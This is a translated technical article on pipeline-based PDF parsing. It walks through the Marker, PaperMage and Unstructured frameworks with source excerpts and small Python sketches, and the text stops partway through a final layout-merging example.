[Translation] Demystifying PDF Parsing: The Pipeline-Based Method

Overview, implementation approaches, and insights

Converting unstructured documents, such as PDF files and scanned images, into structured or semi-structured formats is an important part of artificial intelligence. However, because of the intricate nature of PDF files and the complexity of the tasks involved in parsing them, the process is less straightforward than it first appears.

This series of articles is dedicated to demystifying PDF parsing. In the previous article, we described the main task of PDF parsing, classified the existing methods, and briefly introduced each of them.

This article focuses on the pipeline-based method. We start with an overview of the method, then demonstrate several implementation strategies using existing frameworks that specialize in this task, and finally analyze the insights obtained.

Overview

The pipeline-based method treats PDF parsing as a sequence of processing stages, as shown in Figure 1.

Figure 1: The general flow of the pipeline-based method. Image by the author.

The pipeline-based method can be divided into the following five stages:

Preprocess the PDF files to fix problems such as blur or skewed page orientation. This stage includes image enhancement, orientation correction, and so on.
Perform layout analysis, which consists of two parts: visual and semantic structure analysis. The former identifies the structure of the document and delineates similar regions; the latter labels those regions with specific types such as text, title, list, table, or figure. This stage also determines the reading order of the page.
Process the different regions identified during layout analysis separately. This includes table recognition, text recognition, and the recognition of other components such as formulas, flowcharts, and special symbols.
Reconstruct the page structure of the document from the preceding results.
Output structured or semi-structured information, for example in Markdown, JSON, or HTML.
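
The five stages above can be sketched as a chain of functions that pass a shared state object along. This is only a toy illustration under stated assumptions: `PageState` and every stage function are hypothetical names, and each stage body is a trivial stand-in for the real model or algorithm that would do the work.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List


@dataclass
class PageState:
    """Hypothetical container passed from stage to stage."""
    raw: str
    regions: List[Dict[str, str]] = field(default_factory=list)
    output: str = ""


def preprocess(state: PageState) -> PageState:
    # Stand-in for deskewing or deblurring: here we only normalize whitespace.
    state.raw = " ".join(state.raw.split())
    return state


def analyze_layout(state: PageState) -> PageState:
    # Stand-in for layout analysis: treat the whole page as one text region.
    state.regions = [{"type": "text", "content": state.raw}]
    return state


def recognize_regions(state: PageState) -> PageState:
    # Stand-in for per-region recognition (tables, formulas, OCR, ...).
    for region in state.regions:
        region["recognized"] = region["content"]
    return state


def rebuild_page(state: PageState) -> PageState:
    # Reassemble the regions in reading order (already ordered in this toy case).
    state.output = "\n\n".join(r["recognized"] for r in state.regions)
    return state


def export_markdown(state: PageState) -> PageState:
    # Emit a semi-structured format; Markdown is just one of the options.
    state.output = state.output.strip() + "\n"
    return state


STAGES: List[Callable[[PageState], PageState]] = [
    preprocess,
    analyze_layout,
    recognize_regions,
    rebuild_page,
    export_markdown,
]


def run_pipeline(raw_page: str) -> str:
    state = PageState(raw=raw_page)
    for stage in STAGES:
        state = stage(state)
    return state.output


print(run_pipeline("  Hello   PDF \n world "))
```

Keeping the stages in a plain list makes it easy to swap one implementation for another, which is the main practical appeal of the pipeline-based method.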

We now look at several PDF parsing frameworks. This gives us a feel for the pipeline-based method and yields some insights, which we discuss after each walkthrough.

Marker

Marker is a pipeline built on deep learning models. It can convert PDF, EPUB, and MOBI documents to Markdown.

Overall Process

As shown in Figure 2, Marker's process is divided into the following four steps:

Figure 2: The Marker pipeline. Image by the author.

Step 1: Split the pages into blocks and extract text using PyMuPDF and OCR. The corresponding code is shown below:

def convert_single_pdf(
        fname: str,
        model_lst: List,
        max_pages=None,
        metadata: Optional[Dict]=None,
        parallel_factor: int = 1
) -> Tuple[str, Dict]:
    ...
    ...
    doc = pymupdf.open(fname, filetype=filetype)
    if filetype != "pdf":
        conv = doc.convert_to_pdf()
        doc = pymupdf.open("pdf", conv)


    blocks, toc, ocr_stats = get_text_blocks(
        doc,
        tess_lang,
        spell_lang,
        max_pages=max_pages,
        parallel=int(parallel_factor * settings.OCR_PARALLEL_WORKERS)
    )

Step 2: Use a layout segmenter to classify the blocks, and order them with a column detector. The corresponding code is:

def convert_single_pdf(
        fname: str,
        model_lst: List,
        max_pages=None,
        metadata: Optional[Dict]=None,
        parallel_factor: int = 1
) -> Tuple[str, Dict]:
    ...
    ...
    # Unpack models from list
    texify_model, layoutlm_model, order_model, edit_model = model_lst


    block_types = detect_document_block_types(
        doc,
        blocks,
        layoutlm_model,
        batch_size=int(settings.LAYOUT_BATCH_SIZE * parallel_factor)
    )


    # Find headers and footers
    bad_span_ids = filter_header_footer(blocks)
    out_meta["block_stats"] = {"header_footer": len(bad_span_ids)}


    annotate_spans(blocks, block_types)


    # Dump debug data if the corresponding flags are set
    dump_bbox_debug_data(doc, blocks)


    blocks = order_blocks(
        doc,
        blocks,
        order_model,
        batch_size=int(settings.ORDERER_BATCH_SIZE * parallel_factor)
    )
    ...
    ...

Step 3: Filter headers and footers, fix code and table blocks, and apply the Texify model to formulas. The corresponding code is as follows:

def convert_single_pdf(
        fname: str,
        model_lst: List,
        max_pages=None,
        metadata: Optional[Dict]=None,
        parallel_factor: int = 1
) -> Tuple[str, Dict]:
    ...
    ...
    # Fix code blocks
    code_block_count = identify_code_blocks(blocks)
    out_meta["block_stats"]["code"] = code_block_count
    indent_blocks(blocks)


    # Fix table blocks
    merge_table_blocks(blocks)
    table_count = create_new_tables(blocks)
    out_meta["block_stats"]["table"] = table_count


    for page in blocks:
        for block in page.blocks:
            block.filter_spans(bad_span_ids)
            block.filter_bad_span_types()


    filtered, eq_stats = replace_equations(
        doc,
        blocks,
        block_types,
        texify_model,
        batch_size=int(settings.TEXIFY_BATCH_SIZE * parallel_factor)
    )
    out_meta["block_stats"]["equations"] = eq_stats
    ...
    ...

Step 4: Post-process the text with an editor model. The corresponding code is:

def convert_single_pdf(
        fname: str,
        model_lst: List,
        max_pages=None,
        metadata: Optional[Dict]=None,
        parallel_factor: int = 1
) -> Tuple[str, Dict]:
    ...
    ...
    # Copy to avoid changing the original data
    merged_lines = merge_spans(filtered)
    text_blocks = merge_lines(merged_lines, filtered)
    text_blocks = filter_common_titles(text_blocks)
    full_text = get_full_text(text_blocks)


    # Handle empty blocks being joined
    full_text = re.sub(r'\n{3,}', '\n\n', full_text)
    full_text = re.sub(r'(\n\s){3,}', '\n\n', full_text)


    # Replace bullet characters with a -
    full_text = replace_bullets(full_text)


    # Post-process the text with the editor model
    full_text, edit_stats = edit_full_text(
        full_text,
        edit_model,
        batch_size=settings.EDITOR_BATCH_SIZE * parallel_factor
    )
    out_meta["postprocess_stats"] = {"edit": edit_stats}


    return full_text, out_meta
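
The two `re.sub` calls in Step 4 are easy to try in isolation. The sketch below wraps the same two patterns in a helper; `collapse_blank_lines` is a name introduced here for illustration and is not part of Marker.

```python
import re


def collapse_blank_lines(text: str) -> str:
    # Three or more consecutive newlines become exactly one blank line.
    text = re.sub(r"\n{3,}", "\n\n", text)
    # Three or more "newline + one whitespace character" pairs are collapsed
    # the same way; this catches blank lines that contain a stray space.
    text = re.sub(r"(\n\s){3,}", "\n\n", text)
    return text


print(repr(collapse_blank_lines("a\n\n\n\nb")))
print(repr(collapse_blank_lines("a\n \n \n b")))
```

Both calls return the two paragraphs separated by a single blank line, which is what Markdown needs for a paragraph break.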

Insights from Marker

So far we have only described Marker's overall process. Even so, there is already something to discuss: several insights we can draw from it.

Insight 1: Layout analysis can be divided into several subtasks. The first subtask involves calling PyMuPDF APIs to obtain page blocks.

def ocr_entire_page(page, lang: str, spellchecker: Optional[SpellChecker] = None) -> List[Block]:
    if settings.OCR_ENGINE == "tesseract":
        return ocr_entire_page_tess(page, lang, spellchecker)
    elif settings.OCR_ENGINE == "ocrmypdf":
        return ocr_entire_page_ocrmp(page, lang, spellchecker)
    else:
        raise ValueError(f"Unknown OCR engine {settings.OCR_ENGINE}")




def ocr_entire_page_tess(page, lang: str, spellchecker: Optional[SpellChecker] = None) -> List[Block]:
    try:
        full_tp = page.get_textpage_ocr(flags=settings.TEXT_FLAGS, dpi=settings.OCR_DPI, full=True, language=lang)
        blocks = page.get_text("dict", sort=True, flags=settings.TEXT_FLAGS, textpage=full_tp)["blocks"]
        full_text = page.get_text("text", sort=True, flags=settings.TEXT_FLAGS, textpage=full_tp)


        if len(full_text) == 0:
            return []


        # Check whether OCR worked. If it didn't, return an empty list.
        # OCR can fail, for example, on a scanned blank page with faint text impressions.
        if detect_bad_ocr(full_text, spellchecker):
            return []
    except RuntimeError:
        return []
    return blocks

Insight 2: Fine-tuning small multimodal pre-trained models such as LayoutLMv3 for specific tasks can be very useful. For example, Marker fine-tunes LayoutLMv3 as its layout segmenter model so that it can detect block types.

def load_layout_model():
    model = LayoutLMv3ForTokenClassification.from_pretrained(
        settings.LAYOUT_MODEL_NAME,
        torch_dtype=settings.MODEL_DTYPE,
    ).to(settings.TORCH_DEVICE_MODEL)


    model.config.id2label = {
        0: "Caption",
        1: "Footnote",
        2: "Formula",
        3: "List-item",
        4: "Page-footer",
        5: "Page-header",
        6: "Picture",
        7: "Section-header",
        8: "Table",
        9: "Text",
        10: "Title"
    }


    model.config.label2id = {v: k for k, v in model.config.id2label.items()}
    return model

The data used for this fine-tuning comes from the public DocLayNet dataset.

Insight 3: When parsing PDF files, the number of columns on a page matters a great deal, because it determines the reading order. Marker also includes a second fine-tuned LayoutLMv3 that serves as a column detector model. This model determines the number of columns on the page, and Marker then applies the midpoint method:

def add_column_counts(doc, doc_blocks, model, batch_size):
    for i in range(0, len(doc_blocks), batch_size):
        batch = range(i, min(i + batch_size, len(doc_blocks)))
        rgb_images = []
        bboxes = []
        words = []
        for pnum in batch:
            page = doc[pnum]
            rgb_image, page_bboxes, page_words = get_inference_data(page, doc_blocks[pnum])
            rgb_images.append(rgb_image)
            bboxes.append(page_bboxes)
            words.append(page_words)


        predictions = batch_inference(rgb_images, bboxes, words, model)
        for pnum, prediction in zip(batch, predictions):
            doc_blocks[pnum].column_count = prediction




def order_blocks(doc, doc_blocks: List[Page], model, batch_size=settings.ORDERER_BATCH_SIZE):
    add_column_counts(doc, doc_blocks, model, batch_size)


    for page_blocks in doc_blocks:
        if page_blocks.column_count > 1:
            # Resort blocks based on position
            split_pos = page_blocks.x_start + page_blocks.width / 2
            left_blocks = []
            right_blocks = []
            for block in page_blocks.blocks:
                if block.x_start <= split_pos:
                    left_blocks.append(block)
                else:
                    right_blocks.append(block)
            page_blocks.blocks = left_blocks + right_blocks
    return doc_blocks

This is similar to the approach I described in the article Advanced RAG 02: Unveiling PDF Parsing.
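
The midpoint method can be tried on a few synthetic blocks. The sketch below is a simplified, self-contained variant rather than Marker's code: `Block` and `order_two_columns` are hypothetical names, and, unlike the excerpt above, it also sorts each column from top to bottom.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Block:
    """Hypothetical minimal block: left edge, top edge, and text."""
    x_start: float
    y_start: float
    text: str


def order_two_columns(
    blocks: List[Block], page_x_start: float, page_width: float
) -> List[Block]:
    # The vertical line through the middle of the page separates the columns.
    split_pos = page_x_start + page_width / 2
    left = [b for b in blocks if b.x_start <= split_pos]
    right = [b for b in blocks if b.x_start > split_pos]
    # Extra step in this sketch: read each column from top to bottom.
    left.sort(key=lambda b: b.y_start)
    right.sort(key=lambda b: b.y_start)
    return left + right


blocks = [
    Block(320, 50, "R1"),
    Block(40, 400, "L2"),
    Block(40, 50, "L1"),
    Block(320, 400, "R2"),
]
ordered = order_two_columns(blocks, page_x_start=0, page_width=600)
print([b.text for b in ordered])
```

The method assumes at most two columns of roughly equal width; a block that spans the full page width, such as a title, is assigned to the left column because its left edge lies before the midpoint.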

Insight 4: Specialized models can be trained to handle mathematical formulas. For example, Texify, Marker's formula model, uses the Donut architecture. It was trained on LaTeX images paired with the corresponding equations, scraped from the web (including the im2latex dataset). Training ran on four A6000 GPUs for about two days, which corresponds to roughly 6 epochs.

Insight 5: A model can also be used for post-processing. The main idea is to train a T5 model to take nearly finished text and refine it by removing artifacts, adding spaces, and inserting newlines.

def load_editing_model():
    if not settings.ENABLE_EDITOR_MODEL:
        return None


    model = T5ForTokenClassification.from_pretrained(
            settings.EDITOR_MODEL_NAME,
            torch_dtype=settings.MODEL_DTYPE,
        ).to(settings.TORCH_DEVICE_MODEL)
    model.eval()


    model.config.label2id = {
        "equal": 0,
        "delete": 1,
        "newline-1": 2,
        "space-1": 3,
    }
    model.config.id2label = {v: k for k, v in model.config.label2id.items()}
    return model

As of today, this is all the information I have been able to find about how the post-processor was trained and how its dataset was constructed.
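
To make the four labels more concrete, here is a minimal sketch of how per-token edit labels could be turned back into text. The semantics are an assumption made for illustration (`delete` drops the token, `newline-1` and `space-1` insert one character after the token); `apply_edit_labels` is a hypothetical helper, not Marker's implementation.

```python
from typing import List


def apply_edit_labels(tokens: List[str], labels: List[str]) -> str:
    if len(tokens) != len(labels):
        raise ValueError("tokens and labels must have the same length")
    out: List[str] = []
    for token, label in zip(tokens, labels):
        if label == "equal":
            out.append(token)           # keep the token unchanged
        elif label == "delete":
            continue                    # assumed: drop the token
        elif label == "newline-1":
            out.extend([token, "\n"])   # assumed: newline after the token
        elif label == "space-1":
            out.extend([token, " "])    # assumed: space after the token
        else:
            raise ValueError(f"Unknown label {label!r}")
    return "".join(out)


tokens = ["Hello", "world", "#", "Next"]
labels = ["space-1", "newline-1", "delete", "equal"]
print(apply_edit_labels(tokens, labels))
```

Framing post-processing as token classification keeps the model from rewriting content: it can only keep, drop, or pad tokens that are already there.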

Drawbacks of Marker

Of course, Marker has its drawbacks:

Instead of training or fine-tuning a specialized model for layout analysis, Marker relies on PyMuPDF's built-in functionality. The effectiveness of this approach is questionable.
Marker does not always recognize tables or their titles, and in this respect it falls short of, for example, Nougat (a small-model-based, OCR-free solution that will be covered in detail in the next article). Figure 3 shows the recognition results for Table 3 of the paper "Attention Is All You Need". The original table is on the left, Marker's result is in the middle, and Nougat's result is on the right.

Figure 3: Comparison of table detection and recognition; the original table is Table 3 from the paper "Attention Is All You Need". Image by the author.

Only English-like languages are supported. PDF files in languages such as Japanese and Hindi cannot be parsed.

PaperMage

PaperMage is an open-source framework for analyzing and processing visually rich, structured scientific documents. It provides clear, intuitive abstractions for representing and manipulating the textual and visual elements of a document.

PaperMage integrates various natural language processing (NLP) and computer vision (CV) models into a single framework. It offers ready-to-use solutions for common scientific document processing scenarios.

Below, we describe how PaperMage works and walk through the overall process with source code examples. We then discuss the insights PaperMage offers.

Components

PaperMage has three main components:

Magelib: A library of primitives and methods for representing and manipulating visually rich documents as multimodal structures.
Predictors: An implementation that integrates various state-of-the-art scientific document analysis models behind a unified interface. This works even though the individual models may be written in different frameworks or operate on different modalities.
Recipes: The framework offers well-tested combinations of individual modules, often single-modality, that form sophisticated and extensible multimodal pipelines available, so to speak, as turnkey solutions. These combinations are called Recipes.

Basic Data Classes

Magelib provides three basic data classes for representing the fundamental elements of visually rich structured documents: Document, Layers, and Entities.

Document and Layers

Figure 4 shows how PaperMage creates and represents documents.

Figure 4: How PaperMage creates and represents documents. Source: PaperMage.

After the document structure has been extracted by various algorithms and models, PaperMage conceptualizes it as layers of annotations that store both textual and visual information.

A little later, we will look at the source code and analyze the execution of recipe.run().

Entities

As shown in Figure 5, an entity is a unit of multimodal content.

Figure 5: A PaperMage entity. Source: PaperMage.

But what about discontiguous elements in a document, such as sentences that span columns or even pages, or that are interrupted by floating figures or footnotes?

PaperMage uses two member variables: spans and boxes. As shown in Figure 5, spans identify the sentence's text among all the characters of the document, while boxes capture its visual coordinates on the page. This approach provides a great deal of flexibility and makes it possible to handle even subtle layout differences.
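
The idea of pairing spans with boxes can be illustrated with a small stand-alone data class. This is a sketch of the concept only: `SketchEntity`, its methods, and the tuple layouts are assumptions made for this example and do not reproduce PaperMage's actual `Entity` class.

```python
from dataclasses import dataclass, field
from typing import List, Tuple

Span = Tuple[int, int]                         # [start, end) character offsets
Box = Tuple[float, float, float, float, int]   # left, top, width, height, page


@dataclass
class SketchEntity:
    spans: List[Span] = field(default_factory=list)
    boxes: List[Box] = field(default_factory=list)

    def text(self, symbols: str) -> str:
        # Join the pieces of a discontiguous entity in span order.
        return " ".join(symbols[start:end] for start, end in sorted(self.spans))

    def pages(self) -> List[int]:
        # An entity may have boxes on more than one page.
        return sorted({box[4] for box in self.boxes})


# A sentence interrupted by a floating figure caption.
symbols = "The model works [Figure 1: demo] very well."
tail = symbols.index("very")
sentence = SketchEntity(
    spans=[(0, 15), (tail, len(symbols))],
    boxes=[(0.1, 0.9, 0.8, 0.05, 0), (0.1, 0.1, 0.8, 0.05, 1)],
)
print(sentence.text(symbols))
print(sentence.pages())
```

Because the text lives in spans and the geometry lives in boxes, one sentence can skip over the caption in the character stream and still point at two separate regions on two pages.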

In addition, entities can be accessed in various ways, as shown in Figure 6.

Figure 6: Different ways of accessing entities. Source: PaperMage.

To better understand how PaperMage works, we start with a concrete example of parsing a PDF file and dig into the process as we go.

Overall Process and Code Analysis

The test code is as follows:

from papermage.recipes import CoreRecipe

core_recipe = CoreRecipe()

doc = core_recipe.run("YOUR_PDF_PATH")

First, core_recipe = CoreRecipe() enters the constructor of the CoreRecipe class, where the related libraries and models are initialized.

class CoreRecipe(Recipe):
    def __init__(
        self,
        ivila_predictor_path: str = "allenai/ivila-row-layoutlm-finetuned-s2vl-v2",
        bio_roberta_predictor_path: str = "allenai/vila-roberta-large-s2vl-internal",
        svm_word_predictor_path: str = "https://ai2-s2-research-public.s3.us-west-2.amazonaws.com/mmda/models/svm_word_predictor.tar.gz",
        dpi: int = 72,
    ):
        self.logger = logging.getLogger(self.__class__.__name__)
        self.dpi = dpi


        self.logger.info("Instantiating recipe...")
        self.parser = PDFPlumberParser()
        self.rasterizer = PDF2ImageRasterizer()


        # with warnings.catch_warnings():
        #     warnings.simplefilter("ignore")
        #     self.word_predictor = SVMWordPredictor.from_path(svm_word_predictor_path)


        self.publaynet_block_predictor = LPEffDetPubLayNetBlockPredictor.from_pretrained()
        self.ivila_predictor = IVILATokenClassificationPredictor.from_pretrained(ivila_predictor_path)
        self.sent_predictor = PysbdSentencePredictor()
        self.logger.info("Finished instantiating recipe")

Because class Recipe is the parent class of CoreRecipe, the call core_recipe.run() is dispatched to Recipe::run().

class Recipe:
    @abstractmethod
    def run(self, input: Any) -> Document:
        if isinstance(input, Path):
            if input.suffix == ".pdf":
                return self.from_pdf(pdf=input)
            if input.suffix == ".json":
                return self.from_json(doc=input)


            raise NotImplementedError("Filetype not yet supported.")


        if isinstance(input, Document):
            return self.from_doc(doc=input)


        if isinstance(input, str):
            if os.path.exists(input):
                input = Path(input)
                return self.run(input=input)
            else:
                return self.from_str(text=input)


        raise NotImplementedError("Document input not yet supported.")

Execution then reaches CoreRecipe::from_pdf() and CoreRecipe::from_doc():

class CoreRecipe(Recipe):
    ...
    ...
    def from_pdf(self, pdf: Path) -> Document:
        self.logger.info("Parsing document...")
        doc = self.parser.parse(input_pdf_path=pdf)


        self.logger.info("Rasterizing document...")
        images = self.rasterizer.rasterize(input_pdf_path=pdf, dpi=self.dpi)
        doc.annotate_images(images=list(images))
        self.rasterizer.attach_images(images=images, doc=doc)
        return self.from_doc(doc=doc)


    def from_doc(self, doc: Document) -> Document:
        # self.logger.info("Predicting words...")
        # words = self.word_predictor.predict(doc=doc)
        # doc.annotate_layer(name=WordsFieldName, entities=words)


        self.logger.info("Predicting sentences...")
        sentences = self.sent_predictor.predict(doc=doc)
        doc.annotate_layer(name=SentencesFieldName, entities=sentences)


        self.logger.info("Predicting blocks...")
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            blocks = self.publaynet_block_predictor.predict(doc=doc)
        doc.annotate_layer(name=BlocksFieldName, entities=blocks)


        self.logger.info("Predicting figures and tables...")
        figures = []
        tables = []
        for block in blocks:
            if block.metadata.type == "Figure":
                figure = Entity(boxes=block.boxes)
                figures.append(figure)
            elif block.metadata.type == "Table":
                table = Entity(boxes=block.boxes)
                tables.append(table)
        doc.annotate_layer(name=FiguresFieldName, entities=figures)
        doc.annotate_layer(name=TablesFieldName, entities=tables)


        # self.logger.info("Predicting vila...")
        vila_entities = self.ivila_predictor.predict(doc=doc)
        doc.annotate_layer(name="vila_entities", entities=vila_entities)


        for entity in vila_entities:
            entity.boxes = [
                Box.create_enclosing_box(
                    [b for t in doc.intersect_by_span(entity, name=TokensFieldName) for b in t.boxes]
                )
            ]
            # entity.text = make_text(entity=entity, document=doc)
        preds = group_by(entities=vila_entities, metadata_field="label", metadata_values_map=VILA_LABELS_MAP)
        doc.annotate(*preds)
        return doc

The overall process is shown in Figure 7:

Figure 7: The overall process of PaperMage; unlabeled arrows denote the merge operation, known in PaperMage as the annotate function. Image by the author.

Figure 7 shows that PaperMage's processing also follows the pipeline-based method.

First, layout analysis is performed with the PDFPlumber library. Then, based on the layout analysis results, specialized algorithms and models are applied to analyze other objects on the page, including sentences, figures, tables, titles, and so on.

Next, we focus on three important processes:

Sentence splitting
Layout structure analysis
Logical structure analysis

Sentence Splitting

Sentence splitting uses PySBD, a rule-based Python package for sentence boundary detection.

The input is a sequence of tokens. The output is the span of each sentence.

[
Unannotated Entity: {'spans': [[0, 212]]}, 
Unannotated Entity: {'spans': [[212, 367]]},  
…
]
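
To show what "the span of each sentence" means in practice, here is a deliberately naive rule-based splitter that returns character offsets. It is a stand-in written for this illustration and is not PySBD's algorithm; PySBD applies a much richer rule set (abbreviations, numbers, quotations) that a single regular expression cannot cover.

```python
import re
from typing import List, Tuple


def sentence_spans(text: str) -> List[Tuple[int, int]]:
    spans: List[Tuple[int, int]] = []
    start = 0
    # Naive rule: a boundary is ., ! or ? followed by whitespace and a capital.
    for match in re.finditer(r"[.!?](?=\s+[A-Z])", text):
        end = match.end()
        spans.append((start, end))
        start = end
    # Whatever remains after the last boundary is the final sentence.
    if start < len(text):
        spans.append((start, len(text)))
    return spans


text = "PDF parsing is hard. Pipelines help! Do they?"
for begin, end in sentence_spans(text):
    print((begin, end), repr(text[begin:end]))
```

As in the output above, the spans are contiguous: each one starts where the previous one ends, so concatenating the slices reproduces the original text.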

Layout Structure Analysis

Layout structure analysis uses the LPEffDetPubLayNetBlockPredictor model. This is a capable deep learning-based object detection model provided by LayoutParser. Its main task is to segment the document into visual block regions.

The input is the page image, referred to as doc.images. The output is a box object and the corresponding type for each block. A box consists of the X coordinate of the top-left corner, the Y coordinate of the top-left corner, the width, the height, and the page number.

[
Unannotated Entity: {'boxes': [[0.5179840190298606, 0.752760137345049, 0.3682081491355128, 0.15176369855069774, 0]], 'metadata': {'type': 'Text'}}, 
Unannotated Entity: {'boxes': [[0.5145780320135539, 0.5080924136055337, 0.3675624668198144, 0.23725746136663078, 0]], 'metadata': {'type': 'Text'}}, 
…
]
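
The box values in this output all lie between 0 and 1, which suggests they are relative to the page size. Under that assumption, the sketch below converts a `[left, top, width, height, page]` box into pixel corner coordinates; `box_to_pixels` is a hypothetical helper, not a PaperMage function.

```python
from typing import Sequence, Tuple


def box_to_pixels(
    box: Sequence[float], page_width: int, page_height: int
) -> Tuple[int, int, int, int, int]:
    left, top, width, height, page = box
    # Scale relative coordinates by the page size and round to whole pixels.
    x1 = round(left * page_width)
    y1 = round(top * page_height)
    x2 = round((left + width) * page_width)
    y2 = round((top + height) * page_height)
    return x1, y1, x2, y2, int(page)


# A block covering the right half of a 1000 x 800 pixel page image.
print(box_to_pixels([0.5, 0.25, 0.25, 0.5, 0], page_width=1000, page_height=800))
```

A conversion like this is useful when cropping a detected block out of the rasterized page image, for example to pass a table region to a dedicated recognizer.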

Logical Structure Analysis

Logical structure analysis uses the IVILATokenClassificationPredictor model. It divides the document into organizational units such as title, abstract, body, footnotes, captions, and so on.

The input is page-level data passed as a dictionary.

{
        'words': ['word1', 'word2', ...],
        'bbox': [[x1, y1, x2, y2], [x1, y1, x2, y2], ...],
        'block_ids': [0, 0, 0, 1 ...],
        'line_ids': [0, 1, 1, 2 ...],
        'labels': [0, 0, 0, 1 ...], # could be empty
    }

The output is the span of each entity.

[
Unannotated Entity: {'spans': [[0, 80]], 'metadata': {'label': 'Title'}}, 
Unannotated Entity: {'spans': [[81, 157]], 'metadata': {'label': 'Author'}}, 
Unannotated Entity: {'spans': [[158, 215]], 'metadata': {'label': 'Paragraph'}}, 
...
]
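
In from_doc(), these labeled entities are then grouped by their label before being annotated onto the document. The sketch below shows the grouping idea on plain dictionaries shaped like the output above; it is an illustration only, and `group_spans_by_label` is a hypothetical helper rather than PaperMage's group_by function.

```python
from collections import defaultdict
from typing import Dict, List


def group_spans_by_label(entities: List[dict]) -> Dict[str, List[List[int]]]:
    grouped: Dict[str, List[List[int]]] = defaultdict(list)
    for entity in entities:
        # Collect every span under the label predicted for its entity.
        grouped[entity["metadata"]["label"]].extend(entity["spans"])
    return dict(grouped)


entities = [
    {"spans": [[0, 80]], "metadata": {"label": "Title"}},
    {"spans": [[81, 157]], "metadata": {"label": "Author"}},
    {"spans": [[158, 215]], "metadata": {"label": "Paragraph"}},
]
print(group_spans_by_label(entities))
```

Each resulting group corresponds to one layer (titles, authors, paragraphs, and so on) that can be attached to the document separately.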

Reflections and Insights on PaperMage

Abstraction of PDF Parsing

The abstraction that PaperMage proposes for PDF parsing is quite effective. It divides the entire PDF into doc, layer, and entity types, which makes elements easier to classify and manage.

Extensibility

PaperMage provides a framework that is easy to extend, which simplifies further development.

For example, to add a custom predictor, we only need to inherit from the base class BasePredictor and override the _predict() function.

from .base_predictor import BasePredictor


class YOUR_NEW_Predictor(BasePredictor):
    ...
    ...
    def _predict(self, doc: Document) -> List[YOUR_RET_TYPE]:
        ...
        ...

Parallelism

Figure 7 shows that PaperMage has room for improvement through parallelization, which is a worthwhile direction for optimization.

Although the current version of PaperMage contains no parallelism-related code, adding parallel processing logic could significantly improve the efficiency of PDF parsing.
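
One way such parallelism could look is sketched below with the standard library. It is an assumption-laden illustration, not PaperMage code: the document is a plain dictionary, the two toy predictors are hypothetical, and only predictors that do not depend on each other's output can be run this way.

```python
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, List

Predictor = Callable[[dict], List[dict]]


def run_predictors_in_parallel(doc: dict, predictors: Dict[str, Predictor]) -> dict:
    # Run independent predictors concurrently on the same read-only document.
    with ThreadPoolExecutor(max_workers=max(1, len(predictors))) as pool:
        futures = {name: pool.submit(fn, doc) for name, fn in predictors.items()}
        results = {name: future.result() for name, future in futures.items()}
    # Merge ("annotate") sequentially so the copy is only mutated in one thread.
    annotated = dict(doc)
    annotated.update(results)
    return annotated


def predict_sentences(doc: dict) -> List[dict]:
    # Toy predictor: the whole text is one sentence.
    return [{"spans": [[0, len(doc["symbols"])]]}]


def predict_blocks(doc: dict) -> List[dict]:
    # Toy predictor: the whole page is one text block.
    return [{"boxes": [[0.0, 0.0, 1.0, 1.0, 0]], "metadata": {"type": "Text"}}]


doc = {"symbols": "A short page."}
result = run_predictors_in_parallel(
    doc, {"sentences": predict_sentences, "blocks": predict_blocks}
)
print(sorted(result))
```

Threads only pay off when the predictors spend their time in code that releases the interpreter lock, such as native inference or I/O; for pure-Python predictors a process pool would be the more likely choice.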

Unstructured

Unstructured is an open-source tool for preprocessing unstructured data. In the previous article, we outlined its overall process.

Here we discuss the insights gained from examining the unstructured framework, in particular how it can help us build our own PDF parsing tool.

About Layout Analysis

Layout analysis in unstructured is very thorough.

If we set strategy='hi_res', layout analysis uses models such as YOLOX or detectron2. To improve detection, they are combined with the PDFMiner tool. The results of both methods are merged to obtain the final layout, as shown in Figure 8.

Figure 8: The PDF parsing process with strategy='hi_res' in unstructured. Image by the author.

Figures 9 and 10 visualize the layout analysis results for page 16 of the BERT paper; the boxes represent the boundaries of each region. The results of the object detection model, shown in Figure 9, are more accurate: tables and images are kept as integral regions. The PDFMiner detection results, shown in Figure 10, by contrast split up the contents of tables and images.

Figure 9: Visualization of the object detection model's results (inferred_layout) for page 16 of the BERT paper; the boxes represent the boundaries of each region. Screenshot by the author.

Figure 10: Visualization of PDFMiner's detection results (extracted_layout) for page 16 of the BERT paper; the boxes represent the boundaries of each region. Screenshot by the author.

The layout-merging code is shown below. It contains a nested loop that evaluates the relationship between each region detected by PDFMiner (extracted_layout) and each region produced by the object detection model (inferred_layout), and then decides whether to merge them.

def merge_inferred_layout_with_extracted_layout(
    inferred_layout: Collection[LayoutElement],
    extracted_layout: Collection[TextRegion],
    page_image_size: tuple,
    same_region_threshold: float = inference_config.LAYOUT_SAME_REGION_THRESHOLD,
    subregion_threshold: float = inference_config.LAYOUT_SUBREGION_THRESHOLD,
) -> List[LayoutElement]:
    """Merge two layouts to produce a single layout."""
    extracted_elements_to_add: List[TextRegion] = []
    inferred_regions_to_remove = []
    w, h = page_image_size
    full_page_region = Rectangle(0, 0, w, h)
    for extracted_region in extracted_layout:
        extracted_is_image = isinstance(extracted_region, ImageTextRegion)
        if extracted_is_image:
            # For our purposes we skip extracted images: we have no text for them, and it is
            # usually hard to get good text bounding boxes for them.

            is_full_page_image = region_bounding_boxes_are_almost_the_same(
                extracted_region.bbox,
                full_page_region,
                FULL_PAGE_REGION_THRESHOLD,
            )


            if is_full_page_image:
                continue
        region_matched = False
        for inferred_region in inferred_layout:
            if inferred_region.source in CHIPPER_VERSIONS:
                continue
            ...
            ...
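
The nested-loop idea can be reduced to a few lines. The sketch below is a heavily simplified stand-in for the real function: it compares rectangles by intersection over union (IoU), and an extracted region is kept only when no inferred region already covers the same area. The function names and the 0.75 threshold are assumptions chosen for this example; they are not unstructured's actual criteria or configuration values.

```python
from typing import List, Tuple

Rect = Tuple[float, float, float, float]  # x1, y1, x2, y2


def iou(a: Rect, b: Rect) -> float:
    # Intersection rectangle; width or height is clamped to 0 if disjoint.
    ix1, iy1 = max(a[0], b[0]), max(a[1], b[1])
    ix2, iy2 = min(a[2], b[2]), min(a[3], b[3])
    inter = max(0.0, ix2 - ix1) * max(0.0, iy2 - iy1)
    area_a = (a[2] - a[0]) * (a[3] - a[1])
    area_b = (b[2] - b[0]) * (b[3] - b[1])
    union = area_a + area_b - inter
    return inter / union if union > 0 else 0.0


def merge_layouts(
    inferred: List[Rect],
    extracted: List[Rect],
    same_region_threshold: float = 0.75,  # illustrative value only
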